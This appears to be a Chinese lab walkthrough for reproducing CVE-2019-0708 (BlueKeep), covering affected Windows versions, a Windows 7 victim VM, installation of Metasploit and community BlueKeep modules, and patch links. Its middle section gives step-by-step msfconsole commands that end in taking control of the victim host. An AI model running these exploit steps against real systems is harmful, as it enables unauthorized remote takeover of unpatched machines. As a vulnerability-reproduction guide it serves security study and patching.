CVE-2019-0708远程桌面代码执行

0x01.漏洞描述

2019年5月,爆出高危漏洞,可通过rdp协议进行连接执行恶意代码,漏洞影响版本

  • Windows 2000 x86 (All Service Packs))
  • Windows XP x86 (All Service Packs))
  • Windows 2003 x86 (All Service Packs))
  • Windows 7 x86 (All Service Packs))
  • Windows 7 x64 (All Service Packs)
  • Windows 2008 R2 x64 (All Service Packs)

0x02.漏洞环境

使用VMware安装Windows7 SP1模拟受害机器

Windows7 SP1下载链接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

upload successful

0x03.Metasploit准备

1.使用如下命令一键安装metasploit-framework

1
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

2.下载Reference中的攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)

1
2
3
4
rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

0x03.复现步骤

使用msfconsole进入metasploit

使用reload_all重新加载0708rdp利用模块

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce使用0708RDP模块攻击

使用set RHOSTS 受害机IP设置受害机IP
使用set RPORT 受害机PORT设置受害机RDP端口号
使用set target ID数字(可选为0-4)设置受害机机器架构

这里我们使用的是target 2满足条件

使用exploit攻击,建立连接

upload successful

完成攻击,成功拿到受害者主机权限

0x04.漏洞修复

目前,Windows已发布针对该漏洞的补丁,用户可通过更新系统最新补丁修复该漏洞。并且微软同时为已停止提供支持的WindowsXP系列和Windows2003系列版本的操作系统也发布了相关补丁。

WindowsXP系列、Windows2003系列版本操作系统用户可访问https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708下载官方补丁。

Windows7系列、Windows2008系列版本操作系统用户可访问https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708下载官方补丁。

0x05.参考连接

1.https://github.com/rapid7/metasploit-framework/pull/12283

2.https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708